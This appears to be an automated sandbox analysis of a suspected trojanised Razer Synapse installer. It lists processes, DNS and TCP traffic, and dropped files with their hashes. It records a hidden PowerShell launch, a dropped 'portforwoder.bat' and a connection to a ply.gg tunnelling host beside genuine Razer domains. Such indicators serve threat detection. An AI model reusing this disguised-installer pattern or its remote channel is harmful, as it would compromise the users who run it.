C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe

"C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 u05srooyhc.execute-api.us-east-1.amazonaws.com udp
DE 99.86.4.106:443 u05srooyhc.execute-api.us-east-1.amazonaws.com tcp
US 8.8.8.8:53 discovery.razerapi.com udp
SE 184.31.15.65:443 discovery.razerapi.com tcp
US 8.8.8.8:53 106.4.86.99.in-addr.arpa udp
US 8.8.8.8:53 manifest.razerapi.com udp
SE 184.31.15.122:443 manifest.razerapi.com tcp
US 8.8.8.8:53 synapse-3-webservice.razerzone.com udp
SE 184.31.15.91:443 synapse-3-webservice.razerzone.com tcp
US 8.8.8.8:53 cdn.razersynapse.com udp
US 172.64.153.135:443 cdn.razersynapse.com tcp
US 8.8.8.8:53 65.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 122.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 91.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 assets.razerzone.com udp
SE 184.31.15.33:443 assets.razerzone.com tcp
US 8.8.8.8:53 135.153.64.172.in-addr.arpa udp
US 8.8.8.8:53 33.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 assets2.razerzone.com udp
SE 184.31.15.115:443 assets2.razerzone.com tcp
US 8.8.8.8:53 115.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 deals-assets-cdn.razerzone.com udp
SE 184.31.15.130:443 deals-assets-cdn.razerzone.com tcp
SE 184.31.15.130:443 deals-assets-cdn.razerzone.com tcp
SE 184.31.15.33:443 assets.razerzone.com tcp
SE 184.31.15.115:443 assets2.razerzone.com tcp
SE 184.31.15.115:80 assets2.razerzone.com tcp
SE 184.31.15.115:80 assets2.razerzone.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 130.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 done-declared.gl.at.ply.gg udp
US 147.185.221.17:43143 done-declared.gl.at.ply.gg tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
SE 184.31.15.33:80 assets.razerzone.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

memory/1288-0-0x00007FFF03ED3000-0x00007FFF03ED5000-memory.dmp

memory/1288-1-0x0000000000960000-0x00000000011E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe

MD5 c6d466e545d5d9732b18ffbd541662e4
SHA1 916683e76e6e59409153b37ba865e4cd0d7fe4bf
SHA256 f051896ab2043d06236e047efd6a2a719a399bb99fc810e5a671412f0ec35dea
SHA512 cfc6296ed0a334983ae28f8d1a94be840ce2afb776ed1a339bd60a65d34a2e99af7d3413b134f64ca40c05f693051ed4eabe12d31313026d64c458921ed1f67f

C:\Users\Admin\AppData\Roaming\portforwoder.bat

MD5 1ea03fad3259b7e127f5e05879db00a9
SHA1 5a0a28fa51768019339626fc0d10777e0860c4cb
SHA256 3a1da018b43f1dd10eb3675d7b636bd32cb0df9e652a14e243f88953f04c8e89
SHA512 c0c58b8bf5711a59bcb8bc34ee328b217f958f77307650ec3084d3c170fb1e7aab42cd4a6e996e53261a630d79ffb5e354ca6f109764e5a6ff805ea1e0a78777

C:\Windows\Installer\Razer\Installer\RazerInstaller.exe

MD5 87e4fc95fbe145e7574cca7c64b0ce0a
SHA1 c25cb07176c3b3f7088dbbfb4b5439a296295b88
SHA256 514826f28c1bd194f65b742cbe3bbe52c0f163bb1a55da80a25639d4e4b6d2ab
SHA512 0c3f7435385eb9cdb9493bb3981df187ef2878d0e6ed9dde9005a88772f88d121de802805ef4c9623686ecfb8a03ceed45ae05b529fb287ce90097869fc2babe

memory/2544-22-0x0000000000640000-0x00000000006F6000-memory.dmp

memory/2544-23-0x000000001B3D0000-0x000000001B446000-memory.dmp

C:\Windows\Installer\Razer\Installer\App\AllSystems.json

MD5 60174d20c177137f40f105103494955d
SHA1 9f416a3648838b6b22a51f6b77ebb4a40af282cf
SHA256 ae1fdc5f37e9a8382dc4e114f633612dbee04ecbb46ab86c0d1a39bdd8c3e527
SHA512 477378dd6533b32a5ae3b069b3eba9c097d53f5c5aa827ba2111f52f38eada730000df6e14f0d4c1950798d4bbd66946cfcff76468e4edab3ecc553e29aab161

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-console-l1-1-0.dll

MD5 11e55839fcb3a53bdfed2a27fb7d5e80
SHA1 e585a1ed88696cd310c12f91ffa27f17f354b4f4
SHA256 f6bdc8ffd172b44f4d169707d9a457aeef619872661229b8629ee4f15eefff0d
SHA512 bec9419e35de03cc145b3c974833f73f1a5082d886de4739351b93bb4cc6c0234efd0e35ad845faba83fa600c4a7d5343eaae949a837d00d5528e6db79438ee4

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-debug-l1-1-0.dll

MD5 64978e199a7239d2c911876447a7f05b
SHA1 0048ce6724db08c64441ce6e573676bc8ae94bf9
SHA256 92b947f1d6236f86ed7e105cff19e23c13d1968861426511b775905e1d26b47a
SHA512 9c64211895473ffc7162b56b0b8e732dec54cf03ea9b9b36fe3cc3339c35fc71fc7173d4e146989db399cb1bcb063079378bb6f778f7d2591cd545550038397c

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-datetime-l1-1-0.dll

MD5 9f3cf9f22836c32d988d7c7e0a977e1b
SHA1 1e7bbd6175bdb04826e60de07aa496493c9b3a3b
SHA256 7d588a5a958e32875d7bd346d1371e6ebfd9d5d2ede47755942badfc9c74e207
SHA512 16c98e6aec67ffe4558c6d3f881301490be5d8a714c1adc6735005613251adb8e1c2cb9b1c0d2504a9a99c61a06b0e30c944ca603fc00fbb18cd20ba1c9bd697

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-profile-l1-1-0.dll

MD5 a472bd416bdc12668523670360650910
SHA1 831d930ef9917e0dccacd8e7f7fd6f3d90082441
SHA256 48dceeea29558966c391cda34e5755386c2e7e252ea0a03d8d1f21e3cb370c5b
SHA512 166134e6c3403f4437e10afb514a55677481d3b03f7cfdf17917a0bb6fa1f387feae58d7dd5dfbc375eae66d24f10c3163ba5958c22beb6978c0b778c2883b6f

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l1-2-0.dll

MD5 ec4f2cb68dcf7e96516eb284003be8bb
SHA1 fb9237719b5e21b9db176e41bdf125e6e7c01b11
SHA256 3816bbb7dd76d8fc6a7b83a0ed2f61b23dd5fc0843d3308ee077cb725d5c9088
SHA512 6cbda80c476a9fcf46458cac45229c96dc9df251230531e25088e834cd954db9ff4561e744f76495f9c57a4068b7635c72c6f9ff838436c54142297ee310b236

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-locale-l1-1-0.dll

MD5 bc75b80a80802146e79c383c94542f06
SHA1 7da2020a855ea6c003d905551a28af456e7519c2
SHA256 81a7a98e11ae94236f34a82a0d450a1100a9b8e752205248de0037a764b91a07
SHA512 0b6a8f6809f1a39c90bfe58ef0d05d997be307cb18771ff8fed6539bf7e19ee8cc3bedc44e1c22f34441db9b82a6470d3814fc7465d1ea82fa30d37278a0fe65

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-string-l1-1-0.dll

MD5 a3eccd7f2f2c45d1553055593278645a
SHA1 23cd6aed1b198ca515d7adb213efae780fbf0537
SHA256 d51dfd972e6df5e8185dce0b4eb26dccb0527c5f1c63bc081677335f69b92b67
SHA512 1dbf60f5df95e72b98b72faccb52f83585bc0bc5b1f65c259e8568d812461b738bb37c96e72e2f272370788cc7dcd7a8e5a698d9fb2c773ce0e17978c19ef858

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-heap-l1-1-0.dll

MD5 aad41d33906cfdb31681ce8276648481
SHA1 6367d1990873c5af2f5d05d31ea083fb8b127883
SHA256 242cb185643df586a5f55735e8810b8d2b6b095c78be206e42cdaae7665bb2cf
SHA512 43b2cf09fcb13211f5bcab6942050e03dfb9ce36b727727f7c764df3754f332f04dc81f411e55caeecfa676c43dd1e977f29b0042c485babaaad609c239a84a9

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-stdio-l1-1-0.dll

MD5 65fe48962755451a1a5bab26e6fd978d
SHA1 d1322c477fe4ff61eedf9433b8deddee27f5adb9
SHA256 5a3d9a0a2c1f9b14cb52d9cce92b761ec1fe0460ea7d994179c96648455ead84
SHA512 940269af2c3a8b5b43ca936df1bb5338ae5166f04c34a163b5938895d19bdd7eadc156add1b96b5508e06088419a7d8f466f40bf01e64b4c547fbc1b20328ed7

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-runtime-l1-1-0.dll

MD5 2f10f2255271b09d58af75f58476899c
SHA1 ca37f8e4c99fb178e718e99eed286d1ef32b00fc
SHA256 24bc147f7c8a2dfcbe9296d83ce75a1f2c02076d8f6e6c81f6032c927ed5888a
SHA512 74d85f5a40bd22eb9c85973bda5e596c3688096dc78fb6984f84ded4757ae82d77894c4cae0f24de77d211bbd869f9a4120a104d7c2ed161b4bb7b8568cf5103

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-process-l1-1-0.dll

MD5 4aa747ecc612240d522c23b51a8be7c1
SHA1 b037be0bc321e9329c7cf0dbf609fdb9b2d82fb4
SHA256 ecc116471ccfa09c599d389d71a574ebed01260b9760021a40665c4d8a22257d
SHA512 fb8c0d4f661fe6c8ce6cd04a3c0661a2f0b6058223edbfea811891aedd343d006c22a8524bf8508c2cc396853252477d5cf3c520889650a24d661f4964bce5c9

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-private-l1-1-0.dll

MD5 538057da2c6ec8b927904346bb808792
SHA1 1156a3d1a653678b9f85aa64ff65bd3c10510b5e
SHA256 f8720e9250c5d5aace6918e1f67f6105f2cd08c0cf55633d2b6b28032d904e9a
SHA512 228531381ae55e7c1a24cfe36101325cd0b95899f2a125c72e82043f13248236171ad89a497e5b1d6c19a5febb8d2bd38cb43e81fbd753f3088aaee1c1791b7d

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-multibyte-l1-1-0.dll

MD5 b7e1023ebbf0e5018c58b5488c03a643
SHA1 b10d3a570d4a44b87480d015aac4d04ef3f0a355
SHA256 e7238f5e38d3991e9d6219255e8cd951d6dd431402c4b4b295a68bd43efa3d48
SHA512 c5536416aeba4b37931e2961a29ea4c8679f6d942289325c9067d46b36797e404c0d8dfd01ce997e89bd42a7f084029d2f2d3cd7485b8cec5e66db50ac1df565

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-math-l1-1-0.dll

MD5 1028042a84aefe816280f22a4517dc68
SHA1 b3437beb0e5a6a062678a0b32cea98f3c5e33580
SHA256 4a88f73cae12080b9a637f76f8ab1b8ac29829817ff03ddd611a25b6981ee573
SHA512 1da4a2d152943447950ae5de80360741c8a827647d1568c18b026376645f15cc9b5d1915dbdb43278adeac1423b20d6e1c97f6ad67ce724a0d91ec84c4e5250c

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 42153324a982f848d7a49bb7406125c2
SHA1 f0878690d23ad0c905f0a6ec37e9ea1edb813195
SHA256 fcd8b213e2e9962b84d1eec4296bbefdf4465398a235e118be12c878fdc08c05
SHA512 1710b3fd90210dd6603f2104de249704cad9d83acdc0c6b96ac24e20c4913679b1e4ee41bb7812d919ba76cadb36f7bd8210ee127325fd9db6b542cf2d0b7f69

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-environment-l1-1-0.dll

MD5 e8ccecac4f06679b9d5e77333d216ee0
SHA1 377363813d0fc18083bdb0456a66efb6598a763a
SHA256 2cf24c6aac48261ab04eb616e85dd707417697764f860fc29dd3955dd2c49226
SHA512 e37db74e11138639e3bb02270589f977bfd803d450ff098d474ca461fd1fabc8e646a177a2082fd0a901fbe15225c4d352567a561c453f56ad8e0097838b945e

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-convert-l1-1-0.dll

MD5 94e386a317faa200aa1dc270ce54e5fd
SHA1 e352ced285c04378bc3f6af4b30fa69df70b8974
SHA256 e4ccd13d5861e3e28984fc7263d79b580a0bc7bbe0d234ed8f1a69706ef908f3
SHA512 f622d303adecdce6ff88acc779d108556c2fdbe1f4140092d2d637c2fc1aaf651c1798291239e1334aabea702d7d380150922abd4e0122cbfc9c079a64dc0e76

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-conio-l1-1-0.dll

MD5 032a139ea3cc41f2bb801cd580759a75
SHA1 4d88e10bcc4e75edc83bca578510d53fc827aa1a
SHA256 905f86530c56c9b453dd8bd9770440de0f6f35aa84b171de747a04d112e35aad
SHA512 4f574dfe92e90c7d6f162c0b69dd56c96031790abe15e52121c7e44980bbab86914ee06fc153fa5f3a77c4f1c6e4c24d7044507880a80b587872477708506a50

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-util-l1-1-0.dll

MD5 96d9965ea02eefeadf1f122dfa724449
SHA1 c6f9eb1babe64b30fb1ff6b74e93db8ac41d1294
SHA256 4f31b2888ca82bd1ff40d71e2d11500456b99940dd469bfb097fcd304676fa38
SHA512 4018eae1e00899a5bd392c9b4f25561cf03292011f52387edd77058f49bd1b7456570f0108338088e5711bf5d6ba33aeb2c7bcd5d24d2744b173ff75bba0347b

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-timezone-l1-1-0.dll

MD5 00b548bf3eab7a6debce296ee5e877de
SHA1 ae18022eb78c192ac3baee32664b9eb011194772
SHA256 d592b91a087c001f9ea38dc5912a90c78fad3a368879d04fd7e5650ed374c8dc
SHA512 3ba15d9a0f1680c2b182cf04fbbfcb0d4f1b607519c161c590928930ad1b3eba8bd417575a51305b9552f0abf0064c74267336ec09cea709aed9228e4eac799e

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 a13048905fc64cd2103094c871c6d826
SHA1 cebb1a74bd5196a3fe174a20543335074a1b7397
SHA256 fb23439a5982e723e8e4ae1a5a35f9bbbfba1e76feb4596668f57093b231da6b
SHA512 e23effc6c17177d07f43955cc8ffa17ed05cc2c0a6430078b37de8536170dc3cb4f8970eba1049b10a789ab5acb423745f9d842dac4d63d5714751186a3f071d

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-synch-l1-2-0.dll

MD5 e4110aa5c8a32b63de2c85e0bc297c54
SHA1 6039680f47750cf56d0c9a1768de815a44b83de7
SHA256 01bb32d692b86ebb39a76893125e0f3aaf957c6e4bd682fb46eac32f6fb65be7
SHA512 0631ea8224403ca113dff9b17852e92c1fcb2820e4f335b668b12689d2a8f058ba33905692f2fd0f4897f8f766db816747ec95478d854b75a0803d2c899e6d98

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-synch-l1-1-0.dll

MD5 99572ae21d1c8afe3d02f1124979e911
SHA1 5b17addc80b1406a3eaa615f5e37d92e953a0bb7
SHA256 e7d39dcb79d739ec030e9a4e2165b264a24c400566056e1fda267fdd1a8b36bd
SHA512 27ca8149d1f0c625de90a3f4cd4a4930ab0c1362ee10a7131ebfd2a88065c2a34c8ad7fb6d95ce33072146b9309488cbfe122984606d631b99d925e3fc42fcff

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 525a156e0ff61306fd44bf7937cacfae
SHA1 6a9a88317a55c939c0cb9f77256f5c3f961d0562
SHA256 41c69b545d931045a280f83b2f5fbe0ea18c35ac42dfca54b661b42fe8e4f982
SHA512 c99147eba45e9561b7a2802b0c15a2df2ac886ce95a95f2980f8bf4d1dff92a69b94f11cd17383b577303f24295b1b7e52b8c80ad26c0bb08862c726b9cd8841

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-string-l1-1-0.dll

MD5 e57ec98e69961e45cc7a4e0666d26b7d
SHA1 70462a1d68bf49908fcb7186743a47a1affc5d7d
SHA256 52c9b061c4c74eeb70019edde2b690c7e9d9744979a3b718d6687b3a83f00def
SHA512 4a450bcbce0eb3f98f78af07673227a55cdf8e7840fa892196cbb8d0f90551b32731f70f171644f8097fda97d57caa4b7430023671b19881764613231a20cdc9

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processthreads-l1-1-1.dll

MD5 f61b9ecb79cd20fc2e8fce87286cfe43
SHA1 7a48accbe43e156f886f1f2836f74e1043feec59
SHA256 bfa24f94ba095174b82d3657f8ecc689eab8ff380c69b1c9a7e311eb70d66386
SHA512 42ab62087bbc9fc9c9003ae96ebb9e9bbfa3db4eb74bd6746da035d53d1002015d8482ecb92620ec65c42b8b2b41d9b0a7793e105b0cf8cb6f713a2bc03241db

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processthreads-l1-1-0.dll

MD5 d5c4b8f7260563f72150a84fe884ee31
SHA1 dae1185359ed25a4974504cd1ceaacde28d4318e
SHA256 02839f3b2bdf6adfc89d2f800cc8acda59a40c3e7ce14ef3026f4c72e202297d
SHA512 09ca23413eecf1df94aa36e53fc6fff0f402f21eda2ef79be6aa087818a5bb82ed98db790a2b5cf4ef91a8f70d8e27f56313bc2054a26872d2cad611c472f0b7

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 2a61e4e21bf255107884b6520af5bbcc
SHA1 884eb1a835bcde4e7fd98134f0be797229f4239a
SHA256 64742ee0729cbe72555247b0165fae03bea7a6b0147869253dae3bb0072173e8
SHA512 d0ca104904352586bbd3da654125b3df9355fe250938a465e8e900d135cec397f1118fdf54829b076df82b8e45fcd7656c2c7aa33ad3c0af5189f7a55e43f498

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 1557093add722d1c5a97c359bfcd0d77
SHA1 a8ce995f00a12a81a13d3ef47ce0834178ed69a4
SHA256 3a20635a223e68418c22858413e8c603aac25723de1cb0f54dd675349ec3213d
SHA512 b7acd6882b4d36b52f1e49e4b61ddd025de8503f765b72c94ec5a0d85b6ced513c348f7c4898675728c851a2632ad71c78937cdec9dff994b7b27ed2d85cdddd

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-memory-l1-1-0.dll

MD5 0ee9e0c830a7534dcfc9be72146796f9
SHA1 cecc860b494135482ae693f8e252301073a98578
SHA256 8f3f0fd765a37f48162f0bd00c3047e79b4eda355223bfcbed4d35b51349cfcc
SHA512 47161e02f4478464ab45c1e3bf9d244d34613e0e68ebe48511a9a0c4e7f8ddb0c1dfd59707c6968c5d76d5027cd19ef748d1235bf74b976410ea6672a6a4bcaf

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-localization-l1-2-0.dll

MD5 dbb81fcc74c59490008ee59bffff5a6d
SHA1 edbb465ab3bea3a4df3f05e5a4e816edbe195c3b
SHA256 f33e6ac5d3e1c4f1d89564fb6aeeac170486c073b67694380755049dbc48eec1
SHA512 2847a73e952bd5f2448264e0bfc8dc1dcd37f8b02d6d6f525ef0cb69c8e634fdcc4637876361b22c53244659039ed305c015435834b61eea15015fed45e9c374

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 e33f52e89dfc376eaf7aa655f260ca76
SHA1 b66e1f934f491544190714966031b6dfd2e349ec
SHA256 0bd03e89a539aaa3100e2f7d9a058964730320e55aee1f85be8fd243eea7017a
SHA512 95cb889599801ba7fa225b633d0fe25fdcc8b495dee5eba05b15a6e53a8a3643b5defe1a881236c40f4fa4365d6775ece067dbb526afdf2015f4d1355c9dfc57

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-interlocked-l1-1-0.dll

MD5 48a5e206d92f3102256ec65e8d570ee0
SHA1 76024fad398dfa4734afce0cc2e5ac117f090ba6
SHA256 a272ae4fc60e511f48950b08f106fcdd3bc86831df908ee78d630f1ae921880c
SHA512 65407da566b571e050c25448be6042e84b0c1c7248422cba00b543af9de425a723b0c7c54c4eb6f534e42b1679a058562d500875ddc4f2b52e6b8e6107b1b575

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-heap-l1-1-0.dll

MD5 ee5c2fb7bc23bfd06ff32556cc7c3b4d
SHA1 5d60ebf016219bbec340d353a4fa541fff596d3f
SHA256 efc9f0e32bce971900ddf66a1a9e68daa3bfb2099a1ba9f24c6ee82da2cbd6e8
SHA512 5d1b8a130c27d8eb63ca0c836bdf63e76afb311de26ed4f25b073bda843ebfa25e136849e3882822257e3783058f30af818a96764d60821a40329cff4e1badac

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-handle-l1-1-0.dll

MD5 6a35a52d536e34ba060a19d06b1dac80
SHA1 0494a9cbf898e5babb6e697fc2de04a128d2fc35
SHA256 a369ef130749bf8cd9f67055179e6f537f200c060af47493d49473912a95021e
SHA512 a8aeb58bcf4b314212c2ab5a8fd3c2edeb97e680f774171d4a79390aa23bb62a414aef0ecd5286ffb68b7ed8f6e713ff1892d6d4cc2cbb67de916c6062e762d9

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l2-1-0.dll

MD5 b9287eb7bcbfdcec2e8d4198fd266509
SHA1 1375b6ff6121ec140668881f4a0b02f0c517f6c7
SHA256 096409422ecd1894e4d6289fd2d1c7490bd83daff0c1e3d16c36c78bd477b895
SHA512 b86348d3f42d0ff465066a14c281088c73ec5e03efacdaabe27a410b054a8a81b438d7e5d030b0d95f53b07783911b8b8200581d4e0b6f1b3cc79f4aae1d67df

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l1-1-0.dll

MD5 d826d27c73d9f2420fb39fbe0745c7f0
SHA1 6e68e239f1a58185c7dad0fcfaac9ecfd2e5726c
SHA256 c0e5d482bd93bf71a73c01d0c1ec0722ea3260eba1f4c87e797bae334b5e9870
SHA512 c49843eb10e4e54c66e0e194dbd29ceab9094bdfe745b6a858cb03e34d73a6326f54804e5e5505deacc87146cbdfba17a0f02e62e76c685bce0cd1ff41962ff4

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 9d74d89f2679c0c5ddb35a1ef30bd182
SHA1 22eaed07a6e477a4001f9467b5462cf4cc15cc16
SHA256 e207ffc6fef144e5d393e79de75f8f20d223f1ac33a011eeb822d30fa2031046
SHA512 725626e961d32398ea5aa120ac0339deeb493fc02ee7ef4d8e586173fdbf768b5cbb1f16f093ae4ecfee87e661170f8f832777640a353df5d651af4a62a2d819

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-utility-l1-1-0.dll

MD5 e0aeba2d9d9ae584d6c1aa0f5929526b
SHA1 3f97b977d8877398d350b373fd441867167bd2ba
SHA256 4eca5b9e5be5750b0bc03fd74b6d5e351cb6d70fd63d5f740a1a122f906390e0
SHA512 cfa02a7afa052c5149a741500063f110462d272af417c33bedeac6ad3af424b181144c8045adc04a44a54dffca4639ae3c135f23d64bcfb66f7d3aa980143799

C:\Windows\Installer\Razer\Installer\App\concrt140.dll

MD5 48db05391b6405f67f65d67095cbfdd9
SHA1 17b78dfe4051aa5e363fd2a5a73e5786f5785be4
SHA256 c1e5d240bc3a1c5b36770110ae35a10fbf7438a5c617e8c751b00bec10fce063
SHA512 a3c9ef1ed24d30af0cc46f0474b5e264e065c758f30fc252ce53bc369bec40f2dfb4c165f634bbf737d284b7a25fe10323d65ef0b805b01de6783ef0cc58ae1e

C:\Windows\Installer\Razer\Installer\App\BLEConnectWrapper.dll

MD5 65611ed7ce210777ba8ae786a5d1a886
SHA1 cb685859d0c4b616fbfda578d3af8369ca2e3ef4
SHA256 315014358c49304953e4d50009b3295dd1350fa995477b3f17163282cfb7d807
SHA512 f36256071f9a47ceb15dc57004f2a74bdc377582fe20317175181060ccc2d49f58ef71627eaacdd775946e40e531ed8941a2fec56a5c45323002fd216f7ddcd5

C:\Windows\Installer\Razer\Installer\App\BLEConnect.dll

MD5 ba549837eca0ce18e7c0b3bbe0cb2292
SHA1 d48a8fd14467fb211f52735e5e92ad4f12f07cee
SHA256 bd882b04e425ff50f6b95ae0a7c3c621063cb31c202af38da8b13ac4e17c19f2
SHA512 21f6f6b01a00c592ffbf1c4e5a05609abdf9a0a91ae1a55d648f76c206a6d35f18d4acd66e4d00bc186de825402a102b630505091341bfbfb17e4273ba7e693e

C:\Windows\Installer\Razer\Installer\App\AWSSDK.Kinesis.dll

MD5 76e80582372e4f00586d51e5f4410a27
SHA1 648b54c8c5269f8cd59524a97108e6288afdb412
SHA256 c069151bc437f06025142a78b5dd7477ca6a847d1bba7323cd962f4496f2ca84
SHA512 95b271d2173eaa94ffc0b62894efb7b8f971bd6c013d65bed6a0b5ff1877bae346b66cb4d80913c37eab03c4cd0db644a888b0b76178d691b1175b2af32a5e9e

C:\Windows\Installer\Razer\Installer\App\AWSSDK.Core.dll

MD5 0a540d4d964be671e0b359a6df1bdda3
SHA1 35a3a95ee3ce802328ea0334abcda110cbd4a7c9
SHA256 8f0cd4ee8b8b590dd3e9a0af236b4cba2e99016603ffa8897f12bbbfeb36fb08
SHA512 b3e15fda68b63d9604049799f23e54b5362851cfcde6915870059bd9c75ac8c5330a3312a07c92b23fcf7d474f8e4a05cda2fc21e60d65ab5ccb3c5b02cfd9d5

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-time-l1-1-0.dll

MD5 c8f1a3b19e5103751202010805bce5c9
SHA1 179cf585ce939d05f9610d4b684e4dda6f452f76
SHA256 d5e2fb8495bbbfb66b2612cd5179c1a5f4746dcdd043ecd474363ffe4a8deb4f
SHA512 879fbe66e5440cbe01bd1814a36345fce6454196c8457969d2ee9e93b749df91d0d95b1da1d368063b7ef2a3ed538449b456eb2c7507a27de60105a0d37dcb71

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5aadi5k.zig.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4036-278-0x0000021447FF0000-0x0000021448012000-memory.dmp

C:\Windows\Installer\Razer\Installer\App\dongle.json

MD5 5bfad26ad566016f436c5c87cb57bff4
SHA1 a50b385d7e4d6fb20911119f3cde9abe8f3ebbad
SHA256 b692f6b0ef46cacfaa10f4069d4bc88ccd054e6149b55e15c5e245cc69d25ded
SHA512 806525138fb39c8a4c3c83f48151edc5775ec0d8453f0d8bd051f4f1a50504a6d4631a2579b5e39a2f17bddc9da380f5e471cdd2bd6f2906e8b12d54d49309d3

C:\Windows\Installer\Razer\Installer\App\dockEID.json

MD5 9e2ba28af9b4c6972ed387ce2245d8a6
SHA1 13f2af4f725e61a7fb07058e8424b3401a1cf349
SHA256 9bdedfd8cb1722256f35a80fe26c4ae469df974e3f08b0ed2b0e2506ea0d004a
SHA512 53e48f3e39e95e042f10f7ea2a3e295855cdb6a13d51ce4319acfbb76bc10cfd5f7a9110d22dbf9c6958981dab7b39f8ec8306fdeced094a706c3b7610b848c2

C:\Windows\Installer\Razer\Installer\App\msvcp140.dll

MD5 a84a8a708751e2cb1f2bb117e9b7f390
SHA1 a9378bae50093465e2ea1567958a1bb656d42149
SHA256 f656f0f98cf2510f4e0fe5d5666643028a6b8bac50bf553c0a464456c0e82934
SHA512 609850f700a3147bbd1947c26ece31aeb0ca70249ec4dcd22f1bdc922fb24b0a20f569de827d4818f32983b65456bc9a9a0e9c23ba1e8eebe8520581a814bc49

C:\Windows\Installer\Razer\Installer\App\InstallerConfiguration.xml

MD5 24fb4d1bdd318445b3533b713cd15e74
SHA1 37745c6785b12535c6236ec05f47ab4a39d6c036
SHA256 3cba28341496ef931b5735176fc6f640012d92ffc18cf95eddd648ee35521caa
SHA512 13ce4750943782cbe39d60fb4ea9c507073849b93ed3794480c4cadf748284e7769a7e12038958042bc7c702b693f1f0aed89dc904f291db1637d5da528a05d2

C:\Windows\Installer\Razer\Installer\App\dummyProt.json

MD5 32a494aa96aeb6a5de217b3dce460c3a
SHA1 6f25af72b649c174cf8357fc24b727d11edcf875
SHA256 731b66b46ae9477920e21e26f4e30fbb9e2e24bc135a0811568254d23598ce9b
SHA512 eb0c39951b79a8684153881881089af50d7fbb7a423e8cbefda226d895420adef80a9166d11111f74f4ff520416a2a1e918d842456ae4d6c160bb49aa6f56491

C:\Windows\Installer\Razer\Installer\App\dongleV2.json

MD5 c0755b4f4a7a8bce8c343b6b8d41ef6a
SHA1 0bc810d82b979f3b84df3847f28508bad68d3db2
SHA256 044103626cfb031b8b3736f172257af5090bdcd097b160d11013c64ae3c710f6
